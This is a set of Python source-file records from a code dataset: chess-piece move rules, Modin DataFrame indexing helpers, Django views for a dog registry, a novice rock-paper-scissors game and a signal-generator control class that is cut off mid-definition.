abs(colonne_source - colonne_cible)\r\n        distance_rangee = abs(rangee_source - rangee_cible)\r\n\r\n        if distance_colonne == 1 and distance_rangee == 2:\r\n            return True\r\n\r\n        if distance_colonne == 2 and distance_rangee == 1:\r\n            return True\r\n\r\n        return False\r\n\r\n    def __repr__(self):\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2658'\r\n            else:\r\n                return 'CB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265e'\r\n            else:\r\n                return 'CN'\r\n\r\n\r\nclass Fou(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, False)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        # A bishop moves diagonally, that is, the distance between the rows and the columns must be the same.\r\n        colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n        rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n        if abs(colonne_source - colonne_cible) != abs(rangee_source - rangee_cible):\r\n            return False\r\n\r\n        # However, it cannot stay in place.\r\n        if colonne_source == colonne_cible and rangee_source == rangee_cible:\r\n            return False\r\n\r\n        return True\r\n\r\n    def __repr__(self):\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2657'\r\n            else:\r\n                return 'FB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265d'\r\n            else:\r\n                return 'FN'\r\n\r\n\r\nclass Roi(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, False)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        # A king can move one square along a row, a column or a diagonal.\r\n        colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n        rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n        distance_colonne = abs(colonne_source - colonne_cible)\r\n        distance_rangee = abs(rangee_source - rangee_cible)\r\n\r\n        # Neither coordinate may change by more than one square, and the king cannot stay in place.\r\n        if distance_colonne > 1 or distance_rangee > 1:\r\n            return False\r\n\r\n        if distance_colonne == 0 and distance_rangee == 0:\r\n            return False\r\n\r\n        return True\r\n\r\n    def __repr__(self):\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2654'\r\n            else:\r\n                return 'RB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265a'\r\n            else:\r\n                return 'RN'\r\n\r\n\r\nclass Dame(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, False)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        # A move for a queen is valid if it moves along a row, a column or a diagonal.\r\n        # Note that we call the methods directly from a class, passing the current object\r\n        # (self) as the first argument. It would have been \"cleaner\" to create new functions\r\n        # shared by the Tour, Fou and Dame classes to avoid making these calls from the class.\r\n        return Tour.peut_se_deplacer_vers(self, position_source, position_cible) or \\\r\n               Fou.peut_se_deplacer_vers(self, position_source, position_cible)\r\n\r\n    def __repr__(self):\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2655'\r\n            else:\r\n                return 'DB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265b'\r\n            else:\r\n                return 'DN'\r\n","sub_path":"TP4/pychecs2/echecs/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":12065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"575555985","text":"import numpy as np\nimport pandas\nfrom pandas.api.types import is_scalar, is_list_like, is_bool\nfrom pandas.core.dtypes.common import is_integer\nfrom pandas.core.indexing import IndexingError\n\nfrom .dataframe import DataFrame\nfrom .series import Series\n\n\"\"\"Indexing Helper Class works as follows:\n\n_LocationIndexerBase provides the methods framework for __getitem__\n  and __setitem__ that work with Ray DataFrame's internal index. Base\n  class's __{get,set}item__ takes in partitions & idx_in_partition data\n  and performs lookup/item write.\n\n_LocIndexer and _iLocIndexer are responsible for indexer specific logic and\n  lookup computation. Loc will take care of enlarging the DataFrame. Both indexers\n  will take care of translating pandas's lookup to Ray DataFrame's internal\n  lookup.\n\nAn illustration is available at\nhttps://github.com/ray-project/ray/pull/1955#issuecomment-386781826\n\"\"\"\n\n\ndef is_slice(x):\n    return isinstance(x, slice)\n\n\ndef is_2d(x):\n    return is_list_like(x) or is_slice(x)\n\n\ndef is_tuple(x):\n    return isinstance(x, tuple)\n\n\ndef is_boolean_array(x):\n    return is_list_like(x) and all(map(is_bool, x))\n\n\ndef is_integer_slice(x):\n    if not is_slice(x):\n        return False\n    for pos in [x.start, x.stop, x.step]:\n        if not ((pos is None) or is_integer(pos)):\n            return False  # one position is neither None nor int\n    return True\n\n\n_ILOC_INT_ONLY_ERROR = \"\"\"\nLocation based indexing can only have [integer, integer slice (START point is\nINCLUDED, END point is EXCLUDED), listlike of integers, boolean array] types.\n\"\"\"\n\n_VIEW_IS_COPY_WARNING = \"\"\"\nModin is making a copy of the DataFrame. 
This behavior diverges from Pandas.\nThis will be fixed in future releases.\n\"\"\"\n\n\ndef _parse_tuple(tup):\n \"\"\"Unpack the user input for getitem and setitem and compute ndim\n\n loc[a] -> ([a], :), 1D\n loc[[a,b],] -> ([a,b], :),\n loc[a,b] -> ([a], [b]), 0D\n \"\"\"\n row_loc, col_loc = slice(None), slice(None)\n\n if is_tuple(tup):\n row_loc = tup[0]\n if len(tup) == 2:\n col_loc = tup[1]\n if len(tup) > 2:\n raise IndexingError(\"Too many indexers\")\n else:\n row_loc = tup\n\n ndim = _compute_ndim(row_loc, col_loc)\n row_scaler = is_scalar(row_loc)\n col_scaler = is_scalar(col_loc)\n row_loc = [row_loc] if row_scaler else row_loc\n col_loc = [col_loc] if col_scaler else col_loc\n\n return row_loc, col_loc, ndim, row_scaler, col_scaler\n\n\ndef _compute_ndim(row_loc, col_loc):\n \"\"\"Compute the ndim of result from locators\n \"\"\"\n row_scaler = is_scalar(row_loc) or is_tuple(row_loc)\n col_scaler = is_scalar(col_loc) or is_tuple(col_loc)\n\n if row_scaler and col_scaler:\n ndim = 0\n elif row_scaler ^ col_scaler:\n ndim = 1\n else:\n ndim = 2\n\n return ndim\n\n\nclass _LocationIndexerBase(object):\n \"\"\"Base class for location indexer like loc and iloc\n \"\"\"\n\n def __init__(self, ray_df):\n self.df = ray_df\n self.qc = ray_df._query_compiler\n self.row_scaler = False\n self.col_scaler = False\n\n def __getitem__(self, row_lookup, col_lookup, ndim):\n qc_view = self.qc.view(row_lookup, col_lookup)\n if ndim == 2:\n return self.df.__constructor__(query_compiler=qc_view)\n if isinstance(self.df, Series) and not self.row_scaler:\n return self.df.__constructor__(query_compiler=qc_view)\n if isinstance(self.df, Series):\n axis = 0\n elif ndim == 0:\n axis = None\n else:\n axis = (\n None\n if self.col_scaler and self.row_scaler\n else 1\n if self.col_scaler\n else 0\n )\n return self.df.__constructor__(query_compiler=qc_view).squeeze(axis=axis)\n\n def __setitem__(self, row_lookup, col_lookup, item):\n \"\"\"\n Args:\n row_lookup: the global row index to write item to\n col_lookup: the global col index to write item to\n item: The new item needs to be set. It can be any shape that's\n broadcast-able to the product of the lookup tables.\n \"\"\"\n if len(row_lookup) == len(self.qc.index) and len(col_lookup) == 1:\n self.df[self.df.columns[col_lookup][0]] = item\n elif len(col_lookup) == len(self.qc.columns) and len(row_lookup) == 1:\n if hasattr(item, \"_query_compiler\"):\n item = item._query_compiler\n new_qc = self.qc.setitem(1, self.qc.index[row_lookup[0]], item)\n self.df._create_or_update_from_compiler(new_qc, inplace=True)\n else:\n to_shape = (len(row_lookup), len(col_lookup))\n item = self._broadcast_item(row_lookup, col_lookup, item, to_shape)\n self._write_items(row_lookup, col_lookup, item)\n\n def _broadcast_item(self, row_lookup, col_lookup, item, to_shape):\n \"\"\"Use numpy to broadcast or reshape item.\n\n Notes:\n - Numpy is memory efficient, there shouldn't be performance issue.\n \"\"\"\n # It is valid to pass a DataFrame or Series to __setitem__ that is larger than\n # the target the user is trying to overwrite. 
This\n if isinstance(item, (pandas.Series, pandas.DataFrame, DataFrame)):\n if not all(idx in item.index for idx in row_lookup):\n raise ValueError(\n \"Must have equal len keys and value when setting with \"\n \"an iterable\"\n )\n if hasattr(item, \"columns\"):\n if not all(idx in item.columns for idx in col_lookup):\n raise ValueError(\n \"Must have equal len keys and value when setting \"\n \"with an iterable\"\n )\n item = item.reindex(index=row_lookup, columns=col_lookup)\n else:\n item = item.reindex(index=row_lookup)\n try:\n item = np.array(item)\n if np.prod(to_shape) == np.prod(item.shape):\n return item.reshape(to_shape)\n else:\n return np.broadcast_to(item, to_shape)\n except ValueError:\n from_shape = np.array(item).shape\n raise ValueError(\n \"could not broadcast input array from shape {from_shape} into shape \"\n \"{to_shape}\".format(from_shape=from_shape, to_shape=to_shape)\n )\n\n def _write_items(self, row_lookup, col_lookup, item):\n \"\"\"Perform remote write and replace blocks.\n \"\"\"\n new_qc = self.qc.write_items(row_lookup, col_lookup, item)\n self.df._create_or_update_from_compiler(new_qc, inplace=True)\n\n\nclass _LocIndexer(_LocationIndexerBase):\n \"\"\"A indexer for ray_df.loc[] functionality\"\"\"\n\n def __getitem__(self, key):\n row_loc, col_loc, ndim, self.row_scaler, self.col_scaler = _parse_tuple(key)\n if isinstance(row_loc, slice) and row_loc == slice(None):\n # If we're only slicing columns, handle the case with `__getitem__`\n if not isinstance(col_loc, slice):\n # Boolean indexers can just be sliced into the columns object and\n # then passed to `__getitem__`\n if is_boolean_array(col_loc):\n col_loc = self.df.columns[col_loc]\n return self.df.__getitem__(col_loc)\n else:\n result_slice = self.df.columns.slice_locs(col_loc.start, col_loc.stop)\n return self.df.iloc[:, slice(*result_slice)]\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n result = super(_LocIndexer, self).__getitem__(row_lookup, col_lookup, ndim)\n # Pandas drops the levels that are in the `loc`, so we have to as well.\n if hasattr(result, \"index\") and isinstance(result.index, pandas.MultiIndex):\n if (\n isinstance(result, Series)\n and not isinstance(col_loc, slice)\n and all(\n col_loc[i] in result.index.levels[i] for i in range(len(col_loc))\n )\n ):\n result.index = result.index.droplevel(list(range(len(col_loc))))\n elif all(row_loc[i] in result.index.levels[i] for i in range(len(row_loc))):\n result.index = result.index.droplevel(list(range(len(row_loc))))\n if (\n hasattr(result, \"columns\")\n and isinstance(result.columns, pandas.MultiIndex)\n and all(col_loc[i] in result.columns.levels[i] for i in range(len(col_loc)))\n ):\n result.columns = result.columns.droplevel(list(range(len(col_loc))))\n return result\n\n def __setitem__(self, key, item):\n row_loc, col_loc, _, __, ___ = _parse_tuple(key)\n if isinstance(row_loc, list) and len(row_loc) == 1:\n if row_loc[0] not in self.qc.index:\n index = self.qc.index.insert(len(self.qc.index), row_loc[0])\n self.qc = self.qc.reindex(labels=index, axis=0)\n self.df._update_inplace(new_query_compiler=self.qc)\n\n if (\n isinstance(col_loc, list)\n and len(col_loc) == 1\n and col_loc[0] not in self.qc.columns\n ):\n new_col = pandas.Series(index=self.df.index)\n new_col[row_loc] = item\n self.df.insert(loc=len(self.df.columns), column=col_loc[0], value=new_col)\n self.qc = self.df._query_compiler\n else:\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n super(_LocIndexer, 
self).__setitem__(row_lookup, col_lookup, item)\n\n def _compute_enlarge_labels(self, locator, base_index):\n \"\"\"Helper for _enlarge_axis, compute common labels and extra labels.\n\n Returns:\n nan_labels: The labels needs to be added\n \"\"\"\n # base_index_type can be pd.Index or pd.DatetimeIndex\n # depending on user input and pandas behavior\n # See issue #2264\n base_index_type = type(base_index)\n locator_as_index = base_index_type(locator)\n\n nan_labels = locator_as_index.difference(base_index)\n common_labels = locator_as_index.intersection(base_index)\n\n if len(common_labels) == 0:\n raise KeyError(\n \"None of [{labels}] are in the [{base_index_name}]\".format(\n labels=list(locator_as_index), base_index_name=base_index\n )\n )\n return nan_labels\n\n def _compute_lookup(self, row_loc, col_loc):\n if is_list_like(row_loc) and len(row_loc) == 1:\n if (\n isinstance(self.qc.index.values[0], np.datetime64)\n and type(row_loc[0]) != np.datetime64\n ):\n row_loc = [pandas.to_datetime(row_loc[0])]\n\n if isinstance(row_loc, slice):\n row_lookup = self.qc.index.get_indexer_for(\n self.qc.index.to_series().loc[row_loc]\n )\n elif isinstance(self.qc.index, pandas.MultiIndex):\n row_lookup = self.qc.index.get_locs(row_loc)\n elif is_boolean_array(row_loc):\n # If passed in a list of booleans, we return the index of the true values\n row_lookup = [i for i, row_val in enumerate(row_loc) if row_val]\n else:\n row_lookup = self.qc.index.get_indexer_for(row_loc)\n if isinstance(col_loc, slice):\n col_lookup = self.qc.columns.get_indexer_for(\n self.qc.columns.to_series().loc[col_loc]\n )\n elif isinstance(self.qc.columns, pandas.MultiIndex):\n col_lookup = self.qc.columns.get_locs(col_loc)\n elif is_boolean_array(col_loc):\n # If passed in a list of booleans, we return the index of the true values\n col_lookup = [i for i, col_val in enumerate(col_loc) if col_val]\n else:\n col_lookup = self.qc.columns.get_indexer_for(col_loc)\n return row_lookup, col_lookup\n\n\nclass _iLocIndexer(_LocationIndexerBase):\n \"\"\"A indexer for ray_df.iloc[] functionality\"\"\"\n\n def __getitem__(self, key):\n row_loc, col_loc, ndim, self.row_scaler, self.col_scaler = _parse_tuple(key)\n self._check_dtypes(row_loc)\n self._check_dtypes(col_loc)\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n result = super(_iLocIndexer, self).__getitem__(row_lookup, col_lookup, ndim)\n return result\n\n def __setitem__(self, key, item):\n row_loc, col_loc, _, __, ___ = _parse_tuple(key)\n self._check_dtypes(row_loc)\n self._check_dtypes(col_loc)\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n super(_iLocIndexer, self).__setitem__(row_lookup, col_lookup, item)\n\n def _compute_lookup(self, row_loc, col_loc):\n row_lookup = (\n pandas.RangeIndex(len(self.qc.index)).to_series().iloc[row_loc].index\n )\n col_lookup = (\n pandas.RangeIndex(len(self.qc.columns)).to_series().iloc[col_loc].index\n )\n return row_lookup, col_lookup\n\n def _check_dtypes(self, locator):\n is_int = is_integer(locator)\n is_int_slice = is_integer_slice(locator)\n is_int_list = is_list_like(locator) and all(map(is_integer, locator))\n is_bool_arr = is_boolean_array(locator)\n\n if not any([is_int, is_int_slice, is_int_list, is_bool_arr]):\n raise ValueError(_ILOC_INT_ONLY_ERROR)\n","sub_path":"modin/pandas/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":13478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} 
+{"seq_id":"231296154","text":"from django.contrib import messages\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\nfrom .models import Dog\nfrom .forms import DogForm\n\n\ndef dog_create(request): # put create\n form = DogForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n # print(form.cleaned_data.get('title'))\n messages.success(request, 'Successfully Created')\n instance.save()\n return HttpResponseRedirect(instance.get_absolute_url())\n # if request.method == 'POST':\n # print(request.POST.get('content'))\n # print(request.POST.get('title'))\n context = {\n 'form': form\n }\n return render(request, 'dog_form.html', context)\n\n\ndef dog_detail(request, id=None): # get/retrieve\n #instance = Dog.objects.get(id=1)\n instance = get_object_or_404(Dog, id=id)\n context = {\n 'name': instance.name,\n 'instance': instance,\n }\n return render(request, 'dog_detail.html', context)\n\n\ndef dog_list(request): # list items\n queryset_list = Dog.objects.all() # .order_by(\"-timestamp\")\n paginator = Paginator(queryset_list, 10) # Show 10 dogs per page\n page_request_var = 'page'\n page = request.GET.get(page_request_var)\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n queryset = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n queryset = paginator.page(paginator.num_pages)\n\n context = {\n 'object_list': queryset,\n 'page_title': 'List of all dogs',\n 'page_request_var': page_request_var,\n }\n\n # if request.user.is_authenticated():\n # context = {\n # 'title': 'My User List'\n # }\n # else:\n # context = {\n # 'title': 'List'\n # }\n return render(request, 'dog_list.html', context)\n\n\ndef dog_update(request, id=None):\n instance = get_object_or_404(Dog, id=id)\n form = DogForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, '<a href=\"#\">Edit</a> Saved',\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n 'name': instance.name,\n 'instance': instance,\n 'form': form,\n }\n return render(request, 'dog_form.html', context)\n\n\ndef dog_delete(request, id=None):\n instance = get_object_or_404(Dog, id=id)\n instance.delete()\n messages.success(request, 'Dog Deleted')\n return redirect('dogs:list')\n","sub_path":"canil/focinhobook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180396230","text":"\r\nimport random \r\n\r\ndef rock_paper_sissors():\r\n anwser = int(input(\"Welcome to Rock, Paper, Sissors. 
Enter r for Rock, p for Paper, or s for Sissors:\"))\r\n \r\n Randomchoice = random.choice(\"Rock\",\"Paper\",\"Sissors\")\r\n #Ties\r\n if (anwser == r and Randomchoice == Rock):\r\n print(\"Tie, Rock, ties with Rock\")\r\n elif (anwser == p and Randomchoice == Paper):\r\n print(\"Tie, paper, ties with paper\")\r\n elif (anwser == s and Randomchoice == Sissors):\r\n print(\"Tie, Sissors, ties with Sissors\") \r\n #Anwser = rock\r\n elif (anwser == r and Randomchoice == Paper):\r\n print(\"You lose, paper covers rock\") \r\n elif (anwser == r and Randomchoice == Sissors):\r\n print(\"You win, Rock crushes sissors\") \r\n #Anwser = Paper\r\n elif (anwser == p and Randomchoice == Rock):\r\n print(\"You win, paper covers rock\") \r\n elif (anwser == p and Randomchoice == Sissors):\r\n print(\"You lose, sissors cut paper\") \r\n #Anwser = sissors\r\n elif (anwser == s and Randomchoice == Rock):\r\n print(\"You lose, Rock crushes sissors\") \r\n elif (anwser == s and Randomchoice == Paper):\r\n print(\"You win, sissors cuts paper\") \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nrock_paper_sissors()","sub_path":"Rock Paper Sissors-1.py","file_name":"Rock Paper Sissors-1.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145849702","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n\n'''\nsg.py - Signal Generator module\n\nCopyright (C) Hatano group, Tokyo Tech - All Rights Reserved.\nThis file is a part of Meow project.\nMeow project is now proprietary and confidential.\nUnauthorized copying or redistribution of this file, via any medium, is strictly prohibited.\n\navailable class(es):\n AgilentE8267D - for Agilent E8267D Signal Generator\n HP83620B - for Hewlett Packard 83620B Signal Generator\n HP83752A - for Hewlett Packard 83752A Signal Generator\n'''\n\n#import time\n\nfrom Inst.exceptions import *\nfrom Inst.Instrument import Instrument\n\n\nclass AgilentE8267D(Instrument):\n '''Class for E8267D\n\n Note that this class is a bit obsolete. 
Should be subclass of HP_SG in the future.\n '''\n\n def output(self, on):\n if on:\n self.inst.write(\"OUTP ON\")\n else:\n self.inst.write(\"OUTP OFF\")\n\n def query_power_condition(self):\n ans = int(self.inst.ask(\":STAT:QUES:POW:COND?\"))\n\n if ans == 2:\n self.logger.warning(\"OUTPUT UNLEVELED\")\n elif ans > 0:\n self.logger.warning(\"POWER CONDITION IS QUESTIONABLE\")\n\n return ans\n\n def set_freq_mode(self, mode):\n '''Set Frequency mode\n available values: FIXed CW SWEep LIST'''\n\n if mode.upper() not in ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'LIST'):\n raise InstProgError('invalid frequency mode.', self.__class__.__name__)\n\n self.inst.write(\"FREQ:MODE \" + mode)\n\n def setup_CW(self, freq, power):\n \"\"\"Setting Continuous Wave output\"\"\"\n\n self.rst()\n\n self.set_freq_mode(\"CW\")\n\n self.set_freq_CW(freq)\n\n self.inst.write(\"POW %.3f dBm\" % power)\n\n def set_freq_CW(self, freq):\n if isinstance(freq, str):\n self.inst.write(\"FREQ %s\" % freq)\n elif isinstance(freq, float) or isinstance(freq, int):\n self.inst.write(\"FREQ %.12E\" % freq)\n\n\nclass HP_SG(Instrument):\n '''Base Class for 83620B and 83752A\n '''\n\n POWER_MODE = ('FIXED', 'FIX', 'SWEEP', 'SWE')\n\n def __init__(self, resource, power_bounds, freq_bounds):\n Instrument.__init__(self, resource, write_termination='\\n', read_termination='\\n', timeout=20000)\n\n self.power_min, self.power_max = power_bounds\n self.freq_min, self.freq_max = freq_bounds\n\n def query_error(self):\n return self.inst.ask('SYST:ERR?')\n\n def query_power_condition(self):\n ans = int(self.inst.ask(\"STAT:QUES:COND?\"))\n\n if ans == 8:\n self.logger.warning(\"OUTPUT UNLEVELED\")\n elif ans > 0:\n self.logger.warning(\"DATA QUESTIONABLE CONDITION REGISTER IS NON-ZERO: %d\" % ans)\n\n return ans\n\n def output(self, on):\n if on:\n self.inst.write(\"OUTP:STAT ON\")\n self.logger.info(\"Output ON\")\n else:\n self.inst.write(\"OUTP:STAT OFF\")\n self.logger.info(\"Output OFF\")\n\n def set_freq_mode(self, mode):\n '''Set Frequency mode\n available values: FIXed CW SWEep\n LIST for HP83620B\n SWCW for HP83752A\n '''\n\n if mode.upper() not in self.FREQ_MODE:\n raise ValueError('invalid frequency mode.')\n\n self.inst.write(\"FREQ:MODE \" + mode)\n\n def set_power_mode(self, mode):\n '''Set Power mode\n available values: FIXed SWEep\n '''\n\n if mode.upper() not in self.POWER_MODE:\n raise ValueError('invalid power mode.')\n\n self.inst.write(\"POW:MODE \" + mode)\n\n def set_sweep_generation(self, stepped=True):\n '''Set sweep generation type.\n if stepped is True stepped sweep.\n else analog sweep.\n '''\n\n if stepped:\n self.inst.write('SWE:GEN STEP')\n else:\n self.inst.write('SWE:GEN ANAL')\n\n def parse_freq(self, freq):\n \"\"\"Parse frequency.\n\n Frequency may be passed as string (e.g. 
'100 MHz') or number (1.0E8).\n        The value is checked only if a number is passed.\n        \"\"\"\n\n        if isinstance(freq, str):\n            return freq\n        elif isinstance(freq, float) or isinstance(freq, int):\n            if freq < self.freq_min or freq > self.freq_max:\n                raise ValueError('Invalid frequency.')\n            return '%.12E' % freq\n        else:\n            raise TypeError('Invalid frequency value type.')\n\n    def set_freq_CW(self, freq):\n        self.inst.write(\"FREQ %s\" % self.parse_freq(freq))\n\n    def set_freq_range(self, start, stop):\n        self.inst.write('FREQ:STAR %s;STOP %s' %\n                        (self.parse_freq(start), self.parse_freq(stop)))\n\n    def set_power(self, power):\n        #print(power)\n        if power < self.power_min or power > self.power_max:\n            raise ValueError('Invalid power.')\n\n        self.inst.write(\"POW %.3f dBm\" % power)\n\n    def set_init_cont(self, on=True):\n        if on:\n            self.inst.write(\"INIT:CONT ON\")\n        else:\n            self.inst.write(\"INIT:CONT OFF\")\n\n    def initiate(self):\n        self.inst.write('INIT')\n\n    def abort(self):\n        self.inst.write('ABOR')\n\n    def trigger(self):\n        self.inst.write('TRIG')\n\n    def set_trig_source(self, source):\n        if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'HOLD'):\n            raise ValueError('invalid trigger source.')\n        self.inst.write('TRIG:SOUR %s' % source)\n\n    def set_sweep_trig_source(self, source):\n        '''Set the stepped sweep point-to-point trigger source.\n        This only applies when SWEep:GEN is set to STEPped.\n        '''\n\n        if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'HOLD'):\n            raise ValueError('invalid sweep trigger source.')\n        self.inst.write('SWE:TRIG:SOUR %s' % source)\n\n    def set_sweep_points(self, num):\n        self.inst.write('SWE:POIN %d' % num)\n\n    def setup_CW(self, freq, power):\n        \"\"\"Setting Continuous Wave output\"\"\"\n\n        # self.rst()  # 2018-08-01: left disabled for now; enabling this reportedly makes the SweepMW3 sweep very slow partway through.\n\n        self.set_freq_mode(\"CW\")\n        self.set_power_mode(\"FIX\")\n\n        self.set_freq_CW(freq)\n        self.set_power(power)\n\n    def setup_freq_sweep(self, start, stop, num, power, start_trig='EXT', sweep_trig='EXT'):\n        '''Convenient function to set up triggered frequency sweep.\n\n        sweep can be initiated by calling initiate() or set_init_cont(True)\n        after this function. 
output(True) should be called before initiation\n        if you want actual RF output.\n        '''\n\n        self.rst()\n        self.set_freq_mode(self.SWEEP_MODE)\n        self.set_power_mode('FIX')\n        self.set_sweep_generation(stepped=True)\n\n        self.set_trig_source(start_trig)\n        self.set_sweep_trig_source(sweep_trig)\n\n        self.set_freq_range(start, stop)\n        self.set_sweep_points(num)\n        self.set_power(power)\n\n\nclass N5182B(HP_SG):\n    FREQ_MODE = ('FIXED', 'FIX', 'CW', 'LIST')\n    SWEEP_MODE = 'LIST'\n\n    POWER_MODE = ('FIXED', 'FIX', 'LIST')\n\n    def set_list_type(self, stepped=True):\n        if stepped:\n            self.inst.write('LIST:TYPE STEP')\n        else:\n            self.inst.write('LIST:TYPE LIST')\n\n    def set_route_trig_out(self, ch, route):\n        if ch not in (1, 2):\n            raise ValueError('invalid output channel')\n        if route.upper() not in ('SWE', 'SWEEP', 'SETT', 'SETTLED', 'PVID', 'PVIDEO',\n                                 'PSYN', 'PSYNC', 'LXI', 'PULS', 'PULSE', 'TRIG', 'TRIGGER1', 'TRIGGER2', 'SFDone', 'NONE'):\n            raise ValueError('invalid output route')\n\n        self.inst.write('ROUT:TRIG%d:OUTP %s' % (ch, route))\n\n    def set_trig_source(self, source, ext='TRIGGER1'):\n        if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'KEY', 'TIM', 'TIMER', 'MAN', 'MANUAL'):\n            raise ValueError('invalid trigger source.')\n        self.inst.write('TRIG:SOUR %s' % source)\n\n        if ext.upper() not in ('TRIG1', 'TRIGGER1', 'TRIG2', 'TRIGGER2', 'PULS', 'PULSE'):\n            raise ValueError('invalid external trigger source')\n        self.inst.write('TRIG:EXT:SOUR %s' % ext)\n\n    def set_sweep_trig_source(self, source, ext='TRIGGER1'):\n        '''Set the stepped sweep point-to-point trigger source.\n        This only applies when SWEep:GEN is set to STEPped.\n        '''\n\n        if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'KEY', 'TIM', 'TIMER', 'MAN', 'MANUAL'):\n            raise ValueError('invalid sweep trigger source.')\n        self.inst.write('LIST:TRIG:SOUR %s' % source)\n\n        if ext.upper() not in ('TRIG1', 'TRIGGER1', 'TRIG2', 'TRIGGER2', 'PULS', 'PULSE'):\n            raise ValueError('invalid external trigger source')\n        self.inst.write('LIST:TRIG:EXT:SOUR %s' % ext)\n\n    def set_dm_source(self, source):\n        \"\"\"Set digital (IQ) modulation source.\n        By default (on RST*), INTernal is selected.\n        \"\"\"\n\n        if source.upper() not in ('EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'SUM'):\n            raise ValueError('invalid digital modulation source')\n        self.inst.write(':DM:SOUR %s' % source)\n\n    def set_dm_invert(self, invert):\n        \"\"\"Set digital (IQ) modulation polarity.\n        If invert is True, Q signal is inverted.\n        This will work only for internally generated I/Q signal.\n        (NOT for external signal!)\n\n        By default (on RST*), polarity is not inverted.\n        \"\"\"\n\n        if invert:\n            self.inst.write(':DM:POL INV')\n        else:\n            self.inst.write(':DM:POL NORM')\n\n    def set_FMparam(self, modFreq, divFreq, path=1):\n        \"\"\"\n        Set parameters for FM.\n        \"\"\"\n        # Sets FM path 1 or 2 to internal at a modulation rate of modFreq Hz\n        self.inst.write('FM'+str(path)+':INT:FREQ '+str(modFreq)+' Hz')\n        # Sets FM path 1 or 2 modulation deviation to divFreq Hz\n        self.inst.write('FM'+str(path)+':DEV '+str(divFreq)+' Hz')\n\n\n    def dm(self, on):\n        \"\"\"If on is True turn on digital modulation.\"\"\"\n\n        if on:\n            self.inst.write(':DM:STAT ON')\n            self.logger.info('Digital modulation ON.')\n        else:\n            self.inst.write(':DM:STAT OFF')\n            self.logger.info('Digital modulation OFF.')\n\n    def setup_freq_sweep(self, start, stop, num, power, start_trig='EXT', sweep_trig='EXT', ext_trig='TRIGGER1', sweep_out=2):\n        '''Convenient function to set up 
triggered frequency sweep.\n\n sweep can be initiated by calling initiate() or set_init_cont(True)\n after this function. output(True) should be called before initiation\n if you want actual RF output.\n\n set_list_type is added.\n '''\n\n self.rst()\n self.set_freq_mode(self.SWEEP_MODE)\n self.set_power_mode('FIX')\n self.set_sweep_generation(stepped=True)\n\n self.set_trig_source(start_trig)\n self.set_sweep_trig_source(sweep_trig)\n\n self.set_list_type(stepped=True) # This is not in the default implementation.\n self.set_route_trig_out(sweep_out, 'SETT') # This is not in the default implementation.\n\n self.set_freq_range(start, stop)\n self.set_sweep_points(num)\n self.set_power(power)\n\n def swich_FM(self, onoff, ch=1):\n stateDict = {'1':'ON', '0':'OFF', 'True':'ON', 'False':'OFF'}\n self.inst.write('FM'+str(ch)+':STAT '+stateDict[str(onoff)])\n \n \nclass HP83620B(HP_SG):\n '''Class for 83620B\n '''\n\n FREQ_MODE = ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'LIST')\n SWEEP_MODE = 'SWE'\n\n def __init__(self, resource, power_bounds=(-110.0, 25.0)):\n if power_bounds[0] < -110.0 or power_bounds[1] > 25.0:\n raise ValueError('Invalid power bounds.')\n HP_SG.__init__(self, resource, power_bounds)\n\n def 